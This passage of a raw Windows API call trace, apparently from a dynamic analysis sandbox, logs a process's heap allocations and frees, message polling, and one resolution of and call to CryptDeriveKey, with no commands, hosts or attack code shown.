[0252.804] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0252.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.805] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0252.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x34aa568, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0252.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.807] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0252.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0252.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0252.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0252.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0252.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0252.808] CryptDeriveKey (in: hProv=0xad31c0, Algid=0x6601, hBaseData=0xaa57a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5920) returned 1 [0252.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0252.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0252.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0252.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0252.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0252.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0252.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0252.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0252.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0252.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0252.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0252.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0252.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0252.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0252.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0252.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0252.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0252.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0252.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0252.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0252.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0252.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0252.815] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0252.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0252.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0252.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0252.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0252.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0252.816] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0252.816] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0252.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.817] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0252.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0252.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0252.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.818] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.819] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0252.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0252.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0252.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0252.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0252.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.819] 